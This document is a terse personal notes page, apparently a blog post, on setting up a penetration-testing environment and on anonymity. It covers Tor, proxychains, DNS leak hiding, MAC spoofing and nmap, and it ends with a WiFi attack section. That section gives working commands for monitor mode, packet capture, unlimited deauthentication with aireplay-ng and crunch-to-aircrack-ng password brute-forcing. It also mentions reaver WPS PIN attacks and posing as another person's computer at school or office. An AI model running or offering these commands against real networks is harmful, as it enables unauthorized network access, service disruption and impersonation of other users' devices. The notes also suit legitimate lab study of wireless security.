Environment Setup
Publish date: Aug 10, 2019
Last updated: Apr 22, 2020
Last updated: Apr 22, 2020
- DKMS
- Dynamic Kernel Module System
Linux kernel modules whose sources generally reside outside the kernel source tree
apt install -y dkms linux-headers-$(uname -r)
VM guest additions module
Do not run tor as root, infact do not browse as root
- Running tor is punishable for 3 years in Germany
- hidden wiki
- proxychains
proxychains firefox www.duckduckgo.com
- Countries which are censored for using tor
- DNS Servers
/etc/resolv.conf/etc/dhcp/dhclient.conf- HIding DNS from our service provider
- DNS Book
- DNSleak
- Change MAC address - Media access control
macchanger- prent to be someone else computer, like other person in school, office
- script to change mac Address at every reboot
@rebootin crontab entries
- IP address physical location
- search engine
what is <IP> - iplookup
- `nslookup
- search engine
- by default
nmapwill scan for1000ports- save
nmapoutput to a file, then manupulate it withgrepandawk - exploit-db
- save
aircarch-ngreaver- WiFi Protected Setup Attack Tool, PINcrunch- generate wordlists from a character set- pipe
crunchoutput toaircrack-ngto forWEP - Interface in Monitor Mode
- Promiscuous mode
wash --interface=wlan0forWPSsearch on internet which router model you are attacking for Lockout attempts
- then plan attack accordingly
2 attempts every 60 seconds
2:60ifconfig wlp2s0 down iwconfig wlp2s0 mode monitor ifconfig wlp2s0 up watch --differences 'cat /proc/net/wireless' airmon-ng check wlan0 airodump-ng wlan0 nmcli device wifi list airodump-ng --bssid <> -c <> -w <file> wlan0 # Deauthenticate airplay-ng -0 0 -a <BSSID> wlan0 crunch 11 11 -t %%%%hunder 1234567890 \ | aircrack-ng -w - SCAN_test01.cap -e <wifiName>
Use
timeoutto run a command for certain timeRun brute force attack in multiple machines
192.168.1.* - wired connection
192.168.0.* - wireless connection
Footnotes
[^2]: